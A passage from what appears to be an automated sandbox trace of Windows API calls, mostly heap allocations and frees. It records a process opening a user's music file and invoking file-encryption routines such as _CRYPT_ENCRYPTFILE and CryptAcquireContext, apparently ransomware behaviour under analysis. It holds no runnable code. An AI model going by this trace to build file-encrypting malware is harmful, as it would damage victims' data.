hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0115.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0115.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0115.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0115.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0115.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0115.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0115.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0115.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.634] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0115.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0115.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0115.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca928 [0115.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca928, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0115.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0115.635] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0115.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0115.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0115.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0115.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0115.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0115.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0115.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0115.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0115.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0115.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0115.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0115.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0115.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0115.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0115.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0115.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0115.636] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\zMKZMHlWmMpV7lZ.m4a" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\zmkzmhlwmmpv7lz.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0115.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0115.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8ab0 [0115.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0115.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0115.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0115.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0115.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0115.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0115.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0115.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0115.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0115.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0115.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0115.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0115.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0115.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0115.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0115.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0115.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0115.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0115.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0115.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0115.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0115.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0115.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0115.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0115.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0115.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0115.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0115.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0115.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0115.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0115.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0115.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0115.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0115.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0115.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0115.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0115.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0115.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0115.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0115.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0115.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0115.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0115.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0115.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0115.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0115.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0115.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0115.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0115.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0115.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0115.638] FreeLibrary (hLibModule=0x772d0000) returned 1 [0115.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0115.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0115.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0115.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4480 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0115.640] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.640] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0115.640] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0115.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0115.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0115.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0115.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0115.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0115.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0115.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0115.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0115.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0115.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0115.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0115.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0115.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0115.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0115.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0115.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0115.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0115.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0115.642] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca4a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0115.643] CloseHandle (hObject=0x258) returned 1 [0115.643] FreeLibrary (hLibModule=0x772d0000) returned 1 [0115.643] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0115.643] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\zMKZMHlWmMpV7lZ.m4a", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x688891c0, ftCreationTime.dwHighDateTime=0x1d5ebe0, ftLastAccessTime.dwLowDateTime=0xc9dd75c0, ftLastAccessTime.dwHighDateTime=0x1d5ecfe, ftLastWriteTime.dwLowDateTime=0xc9dd75c0, ftLastWriteTime.dwHighDateTime=0x1d5ecfe, nFileSizeHigh=0x0, nFileSizeLow=0x132ef, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="zMKZMHlWmMpV7lZ.m4a", cAlternateFileName="ZMKZMH~1.M4A")) returned 0x41ac600 [0115.643] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0115.643] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0115.893] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0115.893] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0115.893] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.893] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0115.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0115.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 